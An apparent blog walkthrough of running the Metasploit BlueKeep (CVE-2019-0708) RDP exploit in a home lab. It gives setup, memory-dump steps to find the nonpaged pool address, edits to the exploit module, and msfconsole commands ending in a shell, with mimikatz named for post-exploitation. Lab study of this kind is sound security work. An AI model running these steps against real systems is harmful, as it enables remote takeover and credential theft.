First off this post is for educational purposes. I used a controlled lab environment to test the BlueKeep Metasploit module. Ok with the disclaimer out of the way – Metasploit team released a BlueKeep (CVE-2019–0708) remote code execution module back in Sep last year. I finally got around to labbing it:
VMware Workstation / VirtualBox or ESXi
Kali Linux 2019 VM
Metasploitable3 VM (or vulnerable Windows 7 / Windows 2K8R2 VM).
RDP must be enabled and allowed through any firewall (simulating the rdp service is active.
For Win 2K8R2 you must set HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0 (to allow RDP PDU on this channel).
For my lab I used ESXi 6.7 with Metasploitable3 (2K8R2).
Non Paged Pool:
You will need to find the memory address of the nonpaged pool as the current Metasploit module is manual. That being it will only use a default value for the target host.
1. Download the vmss2core tool.
2. Take a VM snapshot of the vulnerable host.
3. Download the .vmsn and .vmem files generated after the snapshot.
4. Run the tool, passing the files in this order:
vmss2core-sb-8456865.exe -W “Metasploitable3-Snap1.vmsn” “Metasploitable3-Snap1.vmem”
After that you have a memory.dmp file.
To get the memory address of NPP (non paged pool) download Windbg from the Microsoft App Store. Load the memory.dmp file in Windgb and then use the command !poolfind * you will get a message at the end of the dump:
Searching nonpaged pool (fffffa8006c08000 : fffffa8184200000) for tag 0x2020202a (* )
With that you have the start address of nonpaged pool (fffffa8006c08000).
The next step is to change the address of the respective target, in the file “modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb”.
I edited VMware 15.1 (which corresponds to target 5 in the Metasploit module).
What you are doing here is editing the exploit module with the correct NPP (memory address) for your target host.
Time to switch to your Kali attack vm and run Metasploit:
2. use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
3. set RHOSTS 10.0.0.1 (your target hosts IP address).
4. set TARGET 5
And you’ve just popped a shell using the BlueKeep RCE exploit. Post exploitation is now possible (mimikatz, procdump etc).
To recap, this Metasploit module is very manual, it requires setting the correct memory address and a bit of trial and error to get the remote code execution working. I noticed if the exploit was successful on my vulnerable host, subsequent runs would usually produce a blue screen crash. If your running into issues try setting the groomsize ‘set groomsize 100’ or ‘set groomsize 50’.